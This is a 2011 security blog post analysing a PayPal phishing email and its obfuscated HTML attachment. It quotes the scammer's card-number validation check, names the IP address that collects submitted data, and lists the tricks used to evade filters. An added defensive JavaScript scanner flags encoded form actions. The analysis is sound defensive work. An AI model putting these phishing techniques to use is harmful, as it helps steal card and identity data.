The Latest in IT Security

Phishing scams are getting more sophisticated

25 May 2011

I’ve been tracking phishing scams for about a year now and reporting them on our site: phishingemails.com.

Cyber criminals are putting a lot of effort these days into bypassing security filters. Let’s analyze a phishing email targeting PayPal customers and review the tricks used by the scammers.

1) The email:

This email is quite well written, with no obvious grammar or spelling mistakes. It also sounds important and urges the user to follow the procedure.

There is no link in the email’s body, which makes it harder for security products to scan and detect right away. Hyperlinks within messages can also be treated as potential threats and blocked by default, so leaving them out avoids that filter too.

All instructions are attached in an HTML file (a web page).

2) The attachment:

Again, this is a credible looking form using official logos (including VeriSign).

To avoid detection, the page’s source code has been obfuscated:

By the same token, right-click has been disabled, not for security reasons as the page claims, but to stop people from looking at the source code:

It is crucial that the user fills in the form accurately, as each piece of information is valuable for resale. Here are the validation checks this page uses:

A valid credit card number is very important, so the scammer makes sure it starts with a 4, 5 or 6 and is 15 or 16 characters long:

if(!/^(4|5|6){1}[0-9]{15,16}$/i.test(frm.elements['cuon'].value)){alert("Please enter a valid Card Number")}

3) The recipient:

Finally, when the form has been completed it can be submitted. Here is another trick used to hide the destination address:

This URL contains hex-encoded characters which you can convert using an online tool. Note, however, that the browser decodes them automatically!

So the form is sent to: 81.84.241.146/cgi-bis/next.step.php
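As an added example (not part of the original post), here is a small scanner a mail gateway or analyst could run over an HTML attachment like this one: it pulls out each form’s action URL, undoes %XX percent-encoding and JavaScript-style \xXX escapes the way the browser would, and flags actions that resolve to a bare IP address. The sample attachment and the 192.0.2.10 address are constructed for the example.

```javascript
// Constructed sample attachment: one form with an obfuscated action posting to a
// bare IP (192.0.2.10 is a documentation address), one ordinary form for contrast.
const SAMPLE_ATTACHMENT = `
<html><body oncontextmenu="return false">
<form method="post" action="http://%31%39%32%2e%30%2e%32%2e%31%30/collect.php">
  <input name="cuon">
</form>
<form method="post" action="https://www.example.com/account/update"></form>
</body></html>`;

// Undo the two encodings commonly used to hide a URL from a casual reader.
function decodeObfuscatedUrl(raw) {
  // \xHH escapes as they appear inside a JavaScript string literal
  let s = raw.replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
  // %HH percent-encoding, which the browser decodes silently when the form is submitted
  try {
    s = decodeURIComponent(s);
  } catch (e) {
    // malformed sequence: keep the partially decoded text rather than throw
  }
  return s;
}

// True for a dotted-quad host such as 192.0.2.10 (each octet 0-255).
function isBareIPv4(host) {
  const m = host.match(/^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/);
  return !!m && m.slice(1).every((o) => Number(o) <= 255);
}

// One record per <form ... action="...">: raw and decoded action, host, and the
// reasons it was flagged (encoded action, bare IP host, or unparsable URL).
function scanFormActions(html) {
  const results = [];
  const formRe = /<form\b[^>]*\baction\s*=\s*["']([^"']+)["'][^>]*>/gi;
  let m;
  while ((m = formRe.exec(html)) !== null) {
    const raw = m[1];
    const decoded = decodeObfuscatedUrl(raw);
    const reasons = [];
    if (decoded !== raw) reasons.push('encoded-action');
    let host = '';
    try { host = new URL(decoded).hostname; } catch (e) { reasons.push('unparsable-url'); }
    if (isBareIPv4(host)) reasons.push('ip-host');
    results.push({ raw, decoded, host, suspicious: reasons.length > 0, reasons });
  }
  return results;
}
```

Running scanFormActions(SAMPLE_ATTACHMENT) reports the first form as suspicious on both counts and leaves the second one clean.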

This IP address points to a server located in Portugal.

Final notes:

Not all phishing scams are that sophisticated... In fact, most are sent en masse and probably don’t yield results as good. At the same time, once you create a solid template, you can sell it to other people who don’t need to spend the time or have the knowledge to do these things themselves. They’re just interested in harvesting credit card numbers, Social Insurance numbers and other personally identifiable information.

Last but not least, criminals will use safety tips against us in a rather sarcastic way. For example, we have been told for ages that our banks will never send us emails, right?

Well, here is a phishing email that actually reminds you of that in... an email!

It kind of proves all this security talk is not quite well understood. (I refrained myself from saying something really mean here ;-) )

Jerome Segura
